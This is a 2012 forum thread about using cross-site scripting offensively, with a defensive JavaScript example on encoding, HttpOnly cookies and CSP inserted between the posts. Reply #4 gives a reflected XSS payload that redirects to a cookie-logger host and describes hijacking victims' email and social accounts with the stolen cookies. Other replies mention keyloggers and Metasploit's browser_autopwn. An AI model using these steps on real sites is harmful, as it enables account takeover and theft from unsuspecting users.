Topic: So XSS how to use it usefully? (Read 1345 times)

relax
So XSS how to use it usefully?
« on: August 19, 2012, 12:08:13 am »
Okay, I rephrase myself.
I just started with XSSF and Metasploit and there are a lot of functions that are good, but in the victim list I just get myself.

So correct me if I'm wrong, but to get other people in the list I need to implement my XSS code in, for example, a forum, guest book, a new comment or somewhere where it is saved and executed whenever someone enters the page.

For if I just implement it in a search function (or in my own URL), it only affects me?
Trying it in the URL is only to test the vulnerability.

Am I right or?
How do you use XSS to get, for example, cookies?

Hope this was clearer.

PS: sorry for my crappy English
« Last Edit: August 19, 2012, 12:49:22 am by relax »

Kulverstukas
Re: So XSS how to use it usefully?
« Reply #1 on: August 19, 2012, 12:17:12 am »
What the hell are you trying to explain here?
No punctuation and sucky grammar. Also you use weird terms and abbreviations that I never heard of.
Be a dear and rephrase your post, k?

Sorry for bashing you a bit, but seriously...

P.S. it's not Metaexploit, but Metasploit.
« Last Edit: August 19, 2012, 12:19:39 am by Kulverstukas »

EmilKXZ
Re: So XSS how to use it usefully?
« Reply #2 on: August 19, 2012, 10:54:57 am »
I have some experience reading posts like this. :o It can be quite a task, but it's not entirely cryptic (bad joke coming!): I use "IDA Pro for posters", so I disassembled what he just said. Please use better English next time, I won't be around forever to help you @relax :P

XSS attacks are targeted at the user surfing the web. They essentially attack the browser of the user, not the server that hosts the website. If you want to steal cookies, you'll have to output the cookie into a URL that will "eat it" (accept it as a parameter). I won't be telling you how to do this; for this you should do your own research, I have done enough trying to decrypt your post.

You could also attempt to keylog the user; there are XSS-injected JavaScript keyloggers. Do some research on that too.

You could just go berserk and fuzz every input of a site and discover which one is not filtered, but it is not advisable; there are automated fuzzers for such a task. If you don't want to go installing and testing, just get the latest BackTrack and it's pretty straightforward.

Note to advanced users: before you go to flame me because of helping a novice like this, giving it all chewed for him... if it's really into him, he'll succeed. I am a believer that if persons don't have it within them, they are just unable to and it is away from your hands to help him/her. Thanks.

relax
Re: So XSS how to use it usefully?
« Reply #3 on: August 19, 2012, 04:16:02 pm »
Well, I have solved the problem :)

My problem was dumb thinking and not understanding the exploit mechanics...

Thanks :)

ajmal.josh

  • Guest
Re: So XSS how to use it usefully?
« Reply #4 on: August 31, 2012, 12:25:11 pm »
You can use an XSS vulnerability to hack cookies from the browser. It's a simple way. Create a cookie logger on a free hosting server. The URL to the cookie logger is www.ajmal.com.in (example). Then find an XSS vulnerability. You got a vulnerability in www.joshi.com.in (example).
www.joshi.com.in/search.php?q=<script>window.location="www.ajmal.com.in"</script>
On the cookie logger there may be a txt file with permission 777. It will save cookie values into that txt file. Then you can hack the victim's accounts with the cookie. You need to use the Firefox browser and install a cookie manager in it. Add/edit cookies with the values of the victim and open the desired page. You can open email/social accounts/forums without the password of the victim.
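
Added example, not part of any post in this thread: the defender's side of the reflected `search.php?q=` case and the stored guest-book case discussed above, showing output encoding, `HttpOnly` session cookies and a Content-Security-Policy header. All function names are hypothetical and the sample input is the query string quoted in reply #4.

```javascript
// Added illustration; all function names are hypothetical.

// Encode the characters that let text break out of HTML text or
// quoted-attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// "Before": ?q= is reflected verbatim, so markup in the URL becomes markup
// in the response (reflected XSS, reaches only whoever opens that URL).
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}

// "After": the same page with the value encoded at output time.
function renderSearchSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// Stored case (guest book, comments): keep the raw text, encode on every
// render, because every visitor receives this markup.
function renderGuestbook(entries) {
  return '<ul>' + entries.map((e) => `<li>${escapeHtml(e)}</li>`).join('') + '</ul>';
}

// Session cookie flags: HttpOnly hides the cookie from document.cookie,
// Secure keeps it off plain HTTP, SameSite limits cross-site sending.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Second layer: a CSP without 'unsafe-inline' stops injected inline script
// from running even if an encoding call is missed somewhere.
function securityHeaders() {
  return { 'Content-Security-Policy': "default-src 'self'; script-src 'self'" };
}

// Constructed input: the query string quoted in reply #4 of the thread.
const sample = '<script>window.location="www.ajmal.com.in"</script>';
console.log(renderSearchVulnerable(sample));
console.log(renderSearchSafe(sample));
console.log(renderGuestbook(['hello', sample]));
console.log(sessionCookieHeader('sid', 'constructed-session-id'));
console.log(securityHeaders());
```

With the encoded version the browser displays the query as text instead of parsing it as a script element, and a session cookie set with `HttpOnly` is not visible to page script at all.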

Z3R0

  • Guest
Re: So XSS how to use it usefully?
« Reply #5 on: August 31, 2012, 07:26:49 pm »
You can also use XSS to trigger client-side exploits, and achieve remote code execution on a victim's machine. XSS is not limited to stealing cookies, and making stupid messages with alert boxes. I don't know why this seems to be such a bizarre concept to comprehend for people in the underground, but pentesters go absolutely ape-shit when they find XSS vulnerabilities.

If you're still trying to grasp what I'm talking about, load up the browser_autopwn module in Metasploit, and play around with it on your own to understand the basics. Additionally, MaXe from intern0t wrote a PoC a while ago that was cross-posted to the offsec blog, also demonstrating remote code execution being performed by XSS; however, in his PoC, it was the first documented use of XSS to achieve remote code execution without the use of an external exploit. It was solely done with PHP and JavaScript.

All of you little noobs really need to start learning how to program, and start looking at some of the exploits being posted from the infosec community, and understand how they work. I'm really sick of the same shit being posted endlessly, year after year. All of the information posted so far has been common knowledge since the 90's!!! *WE* are supposed to be the cutting edge of security research. NOT the infosec community. Stop trying to re-accomplish creating fire from lightning and learn to fucking innovate!
« Last Edit: August 31, 2012, 07:27:53 pm by m0rph »